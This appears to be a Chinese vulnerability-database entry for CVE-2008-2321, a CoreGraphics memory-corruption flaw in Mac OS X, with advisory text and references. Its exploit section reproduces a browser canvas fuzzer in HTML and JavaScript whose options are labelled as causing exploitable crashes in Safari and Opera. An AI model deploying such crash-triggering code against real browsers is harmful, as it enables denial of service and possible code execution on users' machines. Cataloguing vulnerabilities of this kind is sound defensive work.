Apple MacOS coregraphics 代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115805 漏洞类型 资源管理错误
发布时间 2008-07-31 更新时间 2009-06-11
CVE编号 CVE-2008-2321 CNNVD-ID CNNVD-200808-025
漏洞平台 OSX CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/32136
https://www.securityfocus.com/bid/30488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-025
|漏洞详情
MacOSX是苹果家族机器所使用的操作系统。MacOSX10.4.11及10.5.4中CoreGraphics存在未知漏洞。远程攻击者可通过某些未知的方式导致拒绝服务(内存耗尽或程序崩溃)或执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/30488/info

Apple Mac OS X is prone to multiple memory-corruption vulnerabilities that affect the CoreGraphics component.

Attackers can exploit these issues to execute arbitrary code in the context of the affected application or cause denial-of-service conditions.

The following versions are affected:

Mac OS X v10.4.11 and prior
Mac OS X Server v10.4.11 and prior
Mac OS X v10.5.4 and prior
Mac OS X Server v10.5.4 and prior

NOTE: These issues were previously covered in BID 30483 (Apple Mac OS X 2008-005 Multiple Security Vulnerabilities), but have been given their own record to better document them. 

<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script>
|受影响的产品
Apple Safari 3.2.3 for Windows Apple Safari 3.2.2 for Windows Apple Safari 3.1.2 for Windows Apple Safari 3.1.1 for Windows Apple Safari 3.0.4 Beta for Windows Apple Safari 3.
|参考资料

来源:BID
名称:30488
链接:http://www.securityfocus.com/bid/30488
来源:BID
名称:30483
链接:http://www.securityfocus.com/bid/30483
来源:APPLE
名称:APPLE-SA-2008-07-31
链接:http://lists.apple.com/archives/security-announce//2008/Jul/msg00003.html
来源:XF
名称:macosx-coregraphics-code-execution(44127)
链接:http://xforce.iss.net/xforce/xfdb/44127
来源:VUPEN
名称:ADV-2009-1522
链接:http://www.vupen.com/english/advisories/2009/1522
来源:SECTRACK
名称:1020603
链接:http://www.securitytracker.com/id?1020603
来源:VUPEN
名称:ADV-2008-3232
链接:http://www.frsirt.com/english/advisories/2008/3232
来源:VUPEN
名称:ADV-2008-2268
链接:http://www.frsirt.com/english/advisories/2008/2268
来源:support.apple.com
链接:http://support.apple.com/kb/HT3613
来源:support.apple.com
链接:http://support.apple.com/kb/HT3318
来源:SECUNIA
名称:35379
链接:http://secunia.com/advisories/35379
来源:SECUNIA
名称:32756
链接:http://secunia.com/advisories/32756
来源:SECUNIA
名称:31326
链接:http://secunia.com/advisories/31326
来源:APPLE
名称:APPLE-SA-2009-06-08-1
链接:http://lists.apple.com/archives/security-